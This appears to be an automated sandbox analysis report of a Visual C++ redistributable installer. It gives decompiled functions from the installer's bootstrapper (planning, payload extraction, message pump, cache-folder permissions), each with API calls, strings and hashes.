                                                                          • Failed to append rollback cache action., xrefs: 00020B2D
                                                                          • Failed to append payload cache action., xrefs: 00020C08
                                                                          • plan.cpp, xrefs: 00020C82
                                                                          • Failed to create syncpoint event., xrefs: 00020C8C
                                                                          • Failed to append cache action., xrefs: 00020BA8
                                                                          • @Met, xrefs: 00020C5E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareCreateErrorEventLastString
                                                                          • String ID: @Met$Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
                                                                          • API String ID: 801187047-3844694319
                                                                          • Opcode ID: f4f6e639188f20e357f82302d71dd9385211300ca40bf2de91cff0bf06d0622f
                                                                          • Instruction ID: 5dac11af84572c7ab30e07e83f51b2fb5444ae9e0eb60a311b1353dabad6f20b
                                                                          • Opcode Fuzzy Hash: f4f6e639188f20e357f82302d71dd9385211300ca40bf2de91cff0bf06d0622f
                                                                          • Instruction Fuzzy Hash: 75619F75900719EFDB11DF68D880AAEBBF9FF84314F21805AE8059B212DB31EE41CB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00056BF6 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 69%
                                                                          			E00056BF6(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				signed int _t67;
				int _t68;
				int _t69;
				int _t70;
				void* _t75;
				intOrPtr _t90;
				signed int _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				intOrPtr* _t99;
				signed int _t100;
				void* _t101;
				signed int _t103;
				void* _t106;

				_t99 = _a4;
				_t93 =  &_v20;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t100 =  *((intOrPtr*)( *_t99 + 0x44))(_t99,  &_v20);
				if(_t100 >= 0) {
					_t67 = E000536D7( &_v20, _v20,  &_v12,  &_v8);
					_t90 = _a8;
					while(1) {
						_t100 = _t67;
						_t103 = _t100;
						if(_t103 != 0) {
							break;
						}
						_t68 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"label", 0xffffffff);
						__eflags = _t68 - 2;
						if(_t68 != 2) {
							_t69 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"scheme", 0xffffffff);
							__eflags = _t69 - 2;
							if(_t69 != 2) {
								_t70 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"term", 0xffffffff);
								__eflags = _t70 - 2;
								if(_t70 != 2) {
									goto L10;
								} else {
									_t17 = _t90 + 8; // 0x5717a
									_t75 = _t17;
									goto L8;
								}
							} else {
								_t15 = _t90 + 4; // 0x57176
								_t75 = _t15;
								L8:
								_push(_v12);
								_push(_t75);
								goto L9;
							}
						} else {
							_push(_v12);
							_push(_t90);
							L9:
							_t100 = E000567C4(_t93);
							__eflags = _t100;
							if(_t100 >= 0) {
								L10:
								__eflags = _v8;
								if(_v8 != 0) {
									__imp__#6(_v8);
									_t21 =  &_v8;
									 *_t21 = _v8 & 0x00000000;
									__eflags =  *_t21;
								}
								_t93 = _v12;
								__eflags = _t93;
								if(_t93 != 0) {
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t25 =  &_v12;
									 *_t25 = _v12 & 0x00000000;
									__eflags =  *_t25;
								}
								_t67 = E000536D7(_t93, _v20,  &_v12,  &_v8);
								continue;
							}
						}
						L27:
						goto L28;
					}
					if(_t103 >= 0) {
						_t100 =  *((intOrPtr*)( *_t99 + 0x30))(_t99,  &_v16);
						if(_t100 >= 0) {
							_t101 = E00053760( &_v16, _v16,  &_v12,  &_v8);
							if(_t101 != 0) {
								L26:
								_t100 =  >=  ? 0 : _t101;
							} else {
								_t92 = _t90 + 0xc;
								_t106 = _t90 + 0xc;
								while(1) {
									_t100 = E000579CC(_t92, _t106, _v12, _t92);
									if(_t100 < 0) {
										goto L27;
									}
									if(_v8 != 0) {
										__imp__#6(_v8);
										_v8 = _v8 & 0x00000000;
									}
									_t98 = _v12;
									if(_t98 != 0) {
										 *((intOrPtr*)( *_t98 + 8))(_t98);
										_v12 = _v12 & 0x00000000;
									}
									_t101 = E00053760(_t98, _v16,  &_v12,  &_v8);
									if(_t101 == 0) {
										continue;
									} else {
										goto L26;
									}
									goto L27;
								}
							}
						}
					}
					goto L27;
				}
				L28:
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				_t94 = _v12;
				if(_t94 != 0) {
					 *((intOrPtr*)( *_t94 + 8))(_t94);
				}
				_t95 = _v16;
				if(_t95 != 0) {
					 *((intOrPtr*)( *_t95 + 8))(_t95);
				}
				_t96 = _v20;
				if(_t96 != 0) {
					 *((intOrPtr*)( *_t96 + 8))(_t96);
				}
				return _t100;
			}























                                                                          0x00056bfe
                                                                          0x00056c01
                                                                          0x00056c06
                                                                          0x00056c09
                                                                          0x00056c0c
                                                                          0x00056c0f
                                                                          0x00056c19
                                                                          0x00056c1d
                                                                          0x00056c2f
                                                                          0x00056c34
                                                                          0x00056ce2
                                                                          0x00056ce2
                                                                          0x00056ce4
                                                                          0x00056ce6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056c4c
                                                                          0x00056c52
                                                                          0x00056c55
                                                                          0x00056c6d
                                                                          0x00056c73
                                                                          0x00056c76
                                                                          0x00056c8d
                                                                          0x00056c93
                                                                          0x00056c96
                                                                          0x00000000
                                                                          0x00056c98
                                                                          0x00056c98
                                                                          0x00056c98
                                                                          0x00000000
                                                                          0x00056c98
                                                                          0x00056c78
                                                                          0x00056c78
                                                                          0x00056c78
                                                                          0x00056c9b
                                                                          0x00056c9b
                                                                          0x00056c9e
                                                                          0x00000000
                                                                          0x00056c9e
                                                                          0x00056c57
                                                                          0x00056c57
                                                                          0x00056c5a
                                                                          0x00056c9f
                                                                          0x00056ca4
                                                                          0x00056ca6
                                                                          0x00056ca8
                                                                          0x00056cae
                                                                          0x00056cae
                                                                          0x00056cb2
                                                                          0x00056cb7
                                                                          0x00056cbd
                                                                          0x00056cbd
                                                                          0x00056cbd
                                                                          0x00056cbd
                                                                          0x00056cc1
                                                                          0x00056cc4
                                                                          0x00056cc6
                                                                          0x00056ccb
                                                                          0x00056cce
                                                                          0x00056cce
                                                                          0x00056cce
                                                                          0x00056cce
                                                                          0x00056cdd
                                                                          0x00000000
                                                                          0x00056cdd
                                                                          0x00056ca8
                                                                          0x00056d67
                                                                          0x00000000
                                                                          0x00056d67
                                                                          0x00056cec
                                                                          0x00056cf8
                                                                          0x00056cfc
                                                                          0x00056d0e
                                                                          0x00056d12
                                                                          0x00056d60
                                                                          0x00056d64
                                                                          0x00056d14
                                                                          0x00056d14
                                                                          0x00056d14
                                                                          0x00056d17
                                                                          0x00056d20
                                                                          0x00056d24
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056d2a
                                                                          0x00056d2f
                                                                          0x00056d35
                                                                          0x00056d35
                                                                          0x00056d39
                                                                          0x00056d3e
                                                                          0x00056d43
                                                                          0x00056d46
                                                                          0x00056d46
                                                                          0x00056d5a
                                                                          0x00056d5e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056d5e
                                                                          0x00056d17
                                                                          0x00056d12
                                                                          0x00056cfc
                                                                          0x00000000
                                                                          0x00056cec
                                                                          0x00056d68
                                                                          0x00056d6c
                                                                          0x00056d71
                                                                          0x00056d71
                                                                          0x00056d77
                                                                          0x00056d7c
                                                                          0x00056d81
                                                                          0x00056d81
                                                                          0x00056d84
                                                                          0x00056d89
                                                                          0x00056d8e
                                                                          0x00056d8e
                                                                          0x00056d91
                                                                          0x00056d96
                                                                          0x00056d9b
                                                                          0x00056d9b
                                                                          0x00056da5

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,label,000000FF,?,?,?,74654160,?,00057172,?,?), ref: 00056C4C
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056CB7
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056D2F
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056D71
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Free$Compare
                                                                          • String ID: label$scheme$term
                                                                          • API String ID: 1324494773-4117840027
                                                                          • Opcode ID: 3290e609340f72498e347094ebb26a06f75e31e7d51186ea3b9434da30f7d22c
                                                                          • Instruction ID: ade9eaad95b0d6d6e8964cf4b796c2a5f7ce19f0d551988ebb948e7eb6d9ff86
                                                                          • Opcode Fuzzy Hash: 3290e609340f72498e347094ebb26a06f75e31e7d51186ea3b9434da30f7d22c
                                                                          • Instruction Fuzzy Hash: 91515F75E00219FBDB61CB94CC44FAFBBB8EF04712F604695E911AB1A0DB32AE44DB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001CABE Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 59%
                                                                          			E0001CABE(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				short* _v8;
				char _v12;
				int _v16;
				int _v20;
				short* _v24;
				short* _t47;
				intOrPtr* _t56;
				void* _t59;
				intOrPtr* _t60;
				int _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				int _t67;
				int _t68;
				intOrPtr* _t69;

				_t67 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					L18:
					_t68 = E0001C108(_a12,  &_v8);
					if(_t68 == 0x80070103) {
						break;
					}
					if(_t68 < 0) {
						_push("Failed to get next stream.");
						goto L31;
					} else {
						_t69 = _a4;
						_t63 = _t67;
						_t47 = _v8;
						_v24 = _t47;
						_v16 = _t63;
						if( *((intOrPtr*)(_t69 + 4)) <= _t67) {
							L12:
							_push(_t47);
							_t68 = 0x80070490;
							_push("Failed to find embedded payload: %ls");
							L33:
							_push(_t68);
							E0005012F();
						} else {
							_t66 = _t67;
							_v20 = _t67;
							do {
								_t59 =  *_t69 + _t66;
								if( *((intOrPtr*)(_t59 + 4)) != 2) {
									goto L10;
								} else {
									_t64 = _a8;
									if(_t64 == 0 ||  *((intOrPtr*)(_t59 + 0x3c)) == _t64) {
										_t12 = _t59 + 0x38; // 0xfffeb88d
										if(CompareStringW(0x7f, _t67,  *_t12, 0xffffffff, _t47, 0xffffffff) == 2) {
											_t20 = _t59 + 0x50; // 0x153d1
											_t21 = _t59 + 0x18; // 0x50fffff9
											_t68 = E00012D79(_t64, _a16,  *_t21, _t20);
											if(_t68 < 0) {
												_push("Failed to concat file paths.");
												goto L31;
											} else {
												_t24 = _t59 + 0x50; // 0xb7400ff
												_t68 = E00013446(_t64,  *_t24,  &_v12);
												if(_t68 < 0) {
													_push("Failed to get directory portion of local file path");
													goto L31;
												} else {
													_t68 = E00014013(_v12, _t67);
													if(_t68 < 0) {
														_push("Failed to ensure directory exists");
														goto L31;
													} else {
														_t26 = _t59 + 0x50; // 0xb7400ff
														_t68 = E0001C386(_a12,  *_t26);
														if(_t68 < 0) {
															_push("Failed to extract file.");
															L31:
															_push(_t68);
															E0005012F();
														} else {
															 *((intOrPtr*)(_t59 + 0x4c)) = 1;
															goto L18;
														}
													}
												}
											}
										} else {
											_t47 = _v24;
											_t66 = _v20;
											goto L9;
										}
									} else {
										L9:
										_t63 = _v16;
										goto L10;
									}
								}
								goto L34;
								L10:
								_t63 = _t63 + 1;
								_t66 = _t66 + 0x58;
								_v16 = _t63;
								_v20 = _t66;
								_t18 = _t69 + 4; // 0xfffe5de9
							} while (_t63 <  *_t18);
							_t47 = _v8;
							goto L12;
						}
					}
					L34:
					if(_v8 != 0) {
						E000554EF(_v8);
					}
					if(_v12 != 0) {
						E000554EF(_v12);
					}
					return _t68;
				}
				_t56 = _a4;
				_t68 = _t67;
				if( *((intOrPtr*)(_t56 + 4)) > _t68) {
					_t60 =  *_t56;
					_t65 = _a8;
					do {
						if(_t65 == 0 ||  *((intOrPtr*)(_t60 + 0x3c)) == _t65) {
							if( *((intOrPtr*)(_t60 + 0x4c)) < 1) {
								_t68 = 0x8007000d;
								E000137D3(_t56, "payload.cpp", 0x10e, 0x8007000d);
								_push( *_t60);
								_push("Payload was not found in container: %ls");
								goto L33;
							} else {
								goto L24;
							}
						} else {
							goto L24;
						}
						goto L34;
						L24:
						_t67 = _t67 + 1;
						_t60 = _t60 + 0x58;
					} while (_t67 <  *((intOrPtr*)(_t56 + 4)));
				}
				goto L34;
			}



















                                                                          0x0001cac7
                                                                          0x0001cac9
                                                                          0x0001cacc
                                                                          0x0001cb9d
                                                                          0x0001cb9d
                                                                          0x0001cba9
                                                                          0x0001cbb1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cad6
                                                                          0x0001cbfc
                                                                          0x00000000
                                                                          0x0001cadc
                                                                          0x0001cadc
                                                                          0x0001cadf
                                                                          0x0001cae1
                                                                          0x0001cae4
                                                                          0x0001cae7
                                                                          0x0001caed
                                                                          0x0001cb3b
                                                                          0x0001cb3b
                                                                          0x0001cb3c
                                                                          0x0001cb41
                                                                          0x0001cc27
                                                                          0x0001cc27
                                                                          0x0001cc28
                                                                          0x0001caef
                                                                          0x0001caef
                                                                          0x0001caf1
                                                                          0x0001caf4
                                                                          0x0001caf6
                                                                          0x0001cafc
                                                                          0x00000000
                                                                          0x0001cafe
                                                                          0x0001cafe
                                                                          0x0001cb03
                                                                          0x0001cb0f
                                                                          0x0001cb1e
                                                                          0x0001cb4b
                                                                          0x0001cb4f
                                                                          0x0001cb5a
                                                                          0x0001cb5e
                                                                          0x0001cbf5
                                                                          0x00000000
                                                                          0x0001cb64
                                                                          0x0001cb68
                                                                          0x0001cb70
                                                                          0x0001cb74
                                                                          0x0001cbee
                                                                          0x00000000
                                                                          0x0001cb76
                                                                          0x0001cb7f
                                                                          0x0001cb83
                                                                          0x0001cbe7
                                                                          0x00000000
                                                                          0x0001cb85
                                                                          0x0001cb85
                                                                          0x0001cb90
                                                                          0x0001cb94
                                                                          0x0001cbe0
                                                                          0x0001cc01
                                                                          0x0001cc01
                                                                          0x0001cc02
                                                                          0x0001cb96
                                                                          0x0001cb96
                                                                          0x00000000
                                                                          0x0001cb96
                                                                          0x0001cb94
                                                                          0x0001cb83
                                                                          0x0001cb74
                                                                          0x0001cb20
                                                                          0x0001cb20
                                                                          0x0001cb23
                                                                          0x00000000
                                                                          0x0001cb23
                                                                          0x0001cb26
                                                                          0x0001cb26
                                                                          0x0001cb26
                                                                          0x00000000
                                                                          0x0001cb26
                                                                          0x0001cb03
                                                                          0x00000000
                                                                          0x0001cb29
                                                                          0x0001cb29
                                                                          0x0001cb2a
                                                                          0x0001cb2d
                                                                          0x0001cb30
                                                                          0x0001cb33
                                                                          0x0001cb33
                                                                          0x0001cb38
                                                                          0x00000000
                                                                          0x0001cb38
                                                                          0x0001caed
                                                                          0x0001cc30
                                                                          0x0001cc34
                                                                          0x0001cc39
                                                                          0x0001cc39
                                                                          0x0001cc42
                                                                          0x0001cc47
                                                                          0x0001cc47
                                                                          0x0001cc54
                                                                          0x0001cc54
                                                                          0x0001cbb7
                                                                          0x0001cbba
                                                                          0x0001cbbf
                                                                          0x0001cbc1
                                                                          0x0001cbc3
                                                                          0x0001cbc6
                                                                          0x0001cbc8
                                                                          0x0001cbd3
                                                                          0x0001cc0b
                                                                          0x0001cc1b
                                                                          0x0001cc20
                                                                          0x0001cc22
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001cbd5
                                                                          0x0001cbd5
                                                                          0x0001cbd6
                                                                          0x0001cbd9
                                                                          0x0001cbde
                                                                          0x00000000

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,?,000000FF,00015381,?,000152B5,00000000,00015381,FFF9E89D,00015381,000153B5,0001533D,?), ref: 0001CB15
                                                                          Strings
                                                                          • Failed to get next stream., xrefs: 0001CBFC
                                                                          • Failed to get directory portion of local file path, xrefs: 0001CBEE
                                                                          • Failed to concat file paths., xrefs: 0001CBF5
                                                                          • Failed to ensure directory exists, xrefs: 0001CBE7
                                                                          • payload.cpp, xrefs: 0001CC16
                                                                          • Failed to extract file., xrefs: 0001CBE0
                                                                          • Failed to find embedded payload: %ls, xrefs: 0001CB41
                                                                          • Payload was not found in container: %ls, xrefs: 0001CC22
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                          • API String ID: 1825529933-1711239286
                                                                          • Opcode ID: 1d72c33232e2f4354df9970ceb6e751db8a039166d2d14dccf2632469edb9632
                                                                          • Instruction ID: 95fae51422c398464e2b94e4c86ec112e72fef00ad2347e623e0820e5f93c631
                                                                          • Opcode Fuzzy Hash: 1d72c33232e2f4354df9970ceb6e751db8a039166d2d14dccf2632469edb9632
                                                                          • Instruction Fuzzy Hash: FB41CD31984219EBEF259E84CC82DEEBBB5BF40711F108169ED05AB252C331DDC0DB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00014690 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 36%
                                                                          			E00014690(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				void* _v8;
				struct tagMSG _v36;
				void* __ebx;
				long _t29;
				intOrPtr* _t34;
				int _t37;
				intOrPtr* _t40;
				void* _t41;
				void* _t57;
				signed int _t58;
				intOrPtr* _t65;
				void* _t68;
				intOrPtr _t71;
				int _t72;
				int _t73;
				void* _t77;

				_t77 = __eflags;
				_t68 = __edx;
				_t58 = 7;
				memset( &_v36, 0, _t58 << 2);
				_v8 = 0;
				PeekMessageW( &_v36, 0, 0x400, 0x400, 0);
				_t29 = GetCurrentThreadId();
				_t71 = _a4;
				_t72 = E0002FC51( &_v8, _t68, _t77, _t71, _t29,  &_v8);
				if(_t72 >= 0) {
					_t72 = E0001D5C0(_t71 + 0xb8, _v8, _t71 + 0x1c);
					__eflags = _t72;
					if(_t72 >= 0) {
						_t34 =  *((intOrPtr*)(_t71 + 0xc8));
						_t73 =  *((intOrPtr*)( *_t34 + 0xc))(_t34);
						__eflags = _t73;
						if(_t73 >= 0) {
							_push(0);
							_push(0);
							_push(0);
							_t57 = GetMessageW;
							while(1) {
								_t37 = GetMessageW( &_v36, ??, ??, ??);
								__eflags = _t37;
								if(_t37 == 0) {
									break;
								}
								__eflags = _t37 - 0xffffffff;
								if(_t37 == 0xffffffff) {
									_t73 = 0x8000ffff;
									E000137D3(_t37, "engine.cpp", 0x2cd, 0x8000ffff);
									_push("Unexpected return value from message pump.");
									goto L7;
								} else {
									E000143CD(_t57, _t71,  &_v36);
									__eflags = 0;
									_push(0);
									_push(0);
									_push(0);
									continue;
								}
								goto L13;
							}
							 *((intOrPtr*)(_t71 + 0xf8)) = _v36.wParam;
						} else {
							_push("Failed to start bootstrapper application.");
							L7:
							_push(_t73);
							E0005012F();
						}
						L13:
						_t40 =  *((intOrPtr*)(_t71 + 0xc8));
						_t41 =  *((intOrPtr*)( *_t40 + 0x10))(_t40);
						__eflags = _t41 - 0x66;
						if(_t41 != 0x66) {
							__eflags = _t41 - 0x68;
							if(_t41 == 0x68) {
								_push(0x20000006);
								_push(2);
								E0001550F();
								 *_a8 = 1;
								goto L18;
							}
						} else {
							E0001550F(2, 0x20000004, E00023C30( *((intOrPtr*)(_t71 + 0x18))));
							 *((intOrPtr*)(_t71 + 0x18)) = 1;
						}
					} else {
						_push("Failed to load UX.");
						goto L2;
					}
				} else {
					_push("Failed to create engine for UX.");
					L2:
					_push(_t72);
					E0005012F();
					L18:
				}
				E0001D7CF(_t71 + 0xb8);
				_t65 = _v8;
				if(_t65 != 0) {
					 *((intOrPtr*)( *_t65 + 8))(_t65);
				}
				return _t73;
			}



















                                                                          0x00014690
                                                                          0x00014690
                                                                          0x0001469b
                                                                          0x000146a4
                                                                          0x000146ab
                                                                          0x000146b5
                                                                          0x000146bb
                                                                          0x000146c1
                                                                          0x000146cf
                                                                          0x000146d3
                                                                          0x000146f8
                                                                          0x000146fa
                                                                          0x000146fc
                                                                          0x00014705
                                                                          0x00014711
                                                                          0x00014713
                                                                          0x00014715
                                                                          0x00014726
                                                                          0x00014727
                                                                          0x00014728
                                                                          0x00014729
                                                                          0x00014745
                                                                          0x00014749
                                                                          0x0001474b
                                                                          0x0001474d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00014731
                                                                          0x00014734
                                                                          0x0001478a
                                                                          0x0001479a
                                                                          0x0001479f
                                                                          0x00000000
                                                                          0x00014736
                                                                          0x0001473b
                                                                          0x00014740
                                                                          0x00014742
                                                                          0x00014743
                                                                          0x00014744
                                                                          0x00000000
                                                                          0x00014744
                                                                          0x00000000
                                                                          0x00014734
                                                                          0x00014752
                                                                          0x00014717
                                                                          0x00014717
                                                                          0x0001471c
                                                                          0x0001471c
                                                                          0x0001471d
                                                                          0x00014723
                                                                          0x00014758
                                                                          0x00014758
                                                                          0x00014761
                                                                          0x00014764
                                                                          0x00014767
                                                                          0x000147a9
                                                                          0x000147ac
                                                                          0x000147ae
                                                                          0x000147b3
                                                                          0x000147b5
                                                                          0x000147bd
                                                                          0x00000000
                                                                          0x000147bd
                                                                          0x00014769
                                                                          0x00014779
                                                                          0x00014781
                                                                          0x00014781
                                                                          0x000146fe
                                                                          0x000146fe
                                                                          0x00000000
                                                                          0x000146fe
                                                                          0x000146d5
                                                                          0x000146d5
                                                                          0x000146da
                                                                          0x000146da
                                                                          0x000146db
                                                                          0x000147c3
                                                                          0x000147c4
                                                                          0x000147cc
                                                                          0x000147d1
                                                                          0x000147d6
                                                                          0x000147db
                                                                          0x000147db
                                                                          0x000147e6

                                                                          APIs
                                                                          • PeekMessageW.USER32 ref: 000146B5
                                                                          • GetCurrentThreadId.KERNEL32 ref: 000146BB
                                                                            • Part of subcall function 0002FC51: new.LIBCMT ref: 0002FC58
                                                                          • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00014749
                                                                          Strings
                                                                          • Failed to load UX., xrefs: 000146FE
                                                                          • user.cpp, xrefs: 00014795
                                                                          • Failed to start bootstrapper application., xrefs: 00014717
                                                                          • Failed to create user for UX., xrefs: 000146D5
                                                                          • Unexpected return value from message pump., xrefs: 0001479F
                                                                          • wininet.dll, xrefs: 000146E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Message$CurrentPeekThread
                                                                          • String ID: Failed to create user for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$user.cpp$wininet.dll
                                                                          • API String ID: 673430819-2573580774
                                                                          • Opcode ID: 590255ee4feb12738ae071a7b1d0ba50af480dc35d896fc5f4320ecefb017cce
                                                                          • Instruction ID: 95d1207e8d76a2bb0e301a72b0507e481b49efc6359bcfc3a05c49fdf52d2790
                                                                          • Opcode Fuzzy Hash: 590255ee4feb12738ae071a7b1d0ba50af480dc35d896fc5f4320ecefb017cce
                                                                          • Instruction Fuzzy Hash: 0141C371604616BFEB149BA4CC85EFFB3ACEF05315F100125F905EB1A1EB24ED8487A1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00028CB5 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E00028CB5(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v40;
				char _v72;
				char _v104;
				char _v108;
				char _v136;
				signed int _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t23;
				signed short _t31;
				void* _t40;
				void* _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed short _t50;
				signed short _t54;
				signed int _t55;
				void* _t59;

				_t59 = __eflags;
				_t44 = __edx;
				_t41 = __ecx;
				_t18 =  *0x7a008; // 0xfbf51acb
				_v8 = _t18 ^ _t55;
				_t45 = _a4;
				E0003F670(_t45,  &_v136, 0, 0x80);
				_v140 = _v140 & 0x00000000;
				_t23 = E00028A54(_t41, _t59, 0x1a, 0x1f01ff,  &_v136);
				_t40 = 4;
				if(_t23 >= 0) {
					__eflags = E00028A54(_t41, __eflags, 0x16, 0x1f01ff,  &_v104);
					if(__eflags >= 0) {
						__eflags = E00028A54(_t41, __eflags, 1, 0xa0000000,  &_v72);
						if(__eflags >= 0) {
							_t50 = E00028A54(_t41, __eflags, 0x1b, 0xa0000000,  &_v40);
							__eflags = _t50;
							if(_t50 >= 0) {
								_t31 =  &_v136;
								__imp__SetEntriesInAclW(_t40, _t31, 0,  &_v140);
								__eflags = _t31;
								if(_t31 == 0) {
									_t50 = E000554F8(_t41, _t45, 1, 0x80000005, _v108, 0, _v140, 0, 3, 0x7d0);
									__eflags = _t50;
									if(_t50 < 0) {
										_push(_t45);
										_push("Failed to secure cache path: %ls");
										goto L12;
									}
								} else {
									__eflags = _t31;
									_t54 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
									__eflags = _t54;
									_t50 =  >=  ? 0x80004005 : _t54;
									E000137D3(0x80004005, "cache.cpp", 0x63f, _t50);
									_push(_t45);
									_push("Failed to create ACL to secure cache path: %ls");
									goto L12;
								}
							} else {
								_push(_t45);
								_push("Failed to allocate access for Users group to path: %ls");
								goto L12;
							}
						} else {
							_push(_t45);
							_push("Failed to allocate access for Everyone group to path: %ls");
							goto L12;
						}
					} else {
						_push(_t45);
						_push("Failed to allocate access for SYSTEM group to path: %ls");
						goto L12;
					}
				} else {
					_push(_t45);
					_push("Failed to allocate access for Administrators group to path: %ls");
					L12:
					_push(_t50);
					E0005012F();
				}
				if(_v140 != 0) {
					LocalFree(_v140);
				}
				_t46 =  &_v108;
				do {
					if( *_t46 != 0) {
						E00013999( *_t46);
					}
					_t46 = _t46 + 0x20;
					_t40 = _t40 - 1;
				} while (_t40 != 0);
				return E0003DE36(_t40, _v8 ^ _t55, _t44, _t46, _t50);
			}


























                                                                          0x00028cb5
                                                                          0x00028cb5
                                                                          0x00028cb5
                                                                          0x00028cbe
                                                                          0x00028cc5
                                                                          0x00028ccb
                                                                          0x00028cdc
                                                                          0x00028ce1
                                                                          0x00028cf9
                                                                          0x00028d02
                                                                          0x00028d05
                                                                          0x00028d24
                                                                          0x00028d26
                                                                          0x00028d45
                                                                          0x00028d47
                                                                          0x00028d64
                                                                          0x00028d66
                                                                          0x00028d68
                                                                          0x00028d7c
                                                                          0x00028d84
